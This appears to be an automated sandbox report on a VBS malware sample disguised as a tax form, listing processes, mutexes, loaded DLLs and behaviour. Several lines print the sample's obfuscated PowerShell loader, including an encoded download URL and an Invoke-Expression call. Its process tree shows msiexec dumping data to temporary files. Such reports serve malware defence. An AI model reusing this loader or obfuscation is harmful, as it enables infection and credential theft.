              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044731012_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A49012_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040755A12_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043C56012_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B61012_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044D6C012_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004476F012_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B87012_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044081D12_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041495712_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004079EE12_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407AEB12_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044AA8012_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00412AA912_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00404B7412_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00404B0312_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044BBD812_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00404BE512_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00404C7612_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00415CFE12_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00416D7212_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00446D3012_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00446D8B12_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406E8F12_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040503813_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041208C13_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004050A913_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040511A13_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043C13A13_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004051AB13_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044930013_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040D32213_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A4F013_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043A5AB13_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041363113_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044669013_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A73013_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004398D813_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004498E013_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A88613_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043DA0913_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00438D5E13_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00449ED013_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041FE8313_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00430F5413_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004050C214_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004014AB14_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040513314_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004051A414_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040124614_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040CA4614_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040523514_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004032C814_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040168914_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402F6014_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: Custom Export Tax Recovery Form.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5321
              Source: unknownProcess created: Commandline size = 5321
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5321Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@14/12@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,12_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,12_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,12_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Enspnderen.repJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UXHRJ7
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr2maw1d.c0f.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1908
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=988
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33249
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
